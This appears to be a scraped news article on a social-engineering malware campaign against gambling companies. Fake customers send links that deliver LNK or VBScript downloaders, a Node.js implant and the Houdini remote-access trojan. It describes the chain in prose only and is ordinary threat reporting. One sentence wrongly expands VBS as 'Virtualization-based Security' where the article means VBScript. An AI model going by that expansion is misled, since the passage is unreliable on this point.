A new cyber attack campaign has been targeting the gambling and gaming industries since at least September 2022 and is still underway, amid the preparations for the gaming industry trade fair event ICE London 2023 that is set to start on February 7th.
As soon as the customer service agent clicks on the purported screenshot link sent by the “customer”, either an LNK payload or a VBScript file is retrieved, with either of them being specially configured to download and run an MSI package that brings a Node.js implant.
Attackers Masked as Gambling Company Customers Get Access to Sensitive Internal Data
Once the Virtualization-based Security (VBS) downloader is executed by the victim, the cyber attack is finalized in the deployment of a VBS-based trojan ensuring remote access, called Houdini, which was created back in 2013.
For the time being, the origins of the attackers remain unknown. As claimed by Security Joes in its report, the individuals claiming to be gambling operators’ customers and sending the VBS-based remote access trojan have been observed using broken English at the time they communicated with the companies’ customer service agents. Back in October 2022, the MalwareHunterTeam shared some indicators of compromise linked to the cyber attack campaign targeting gambling companies from all over the world.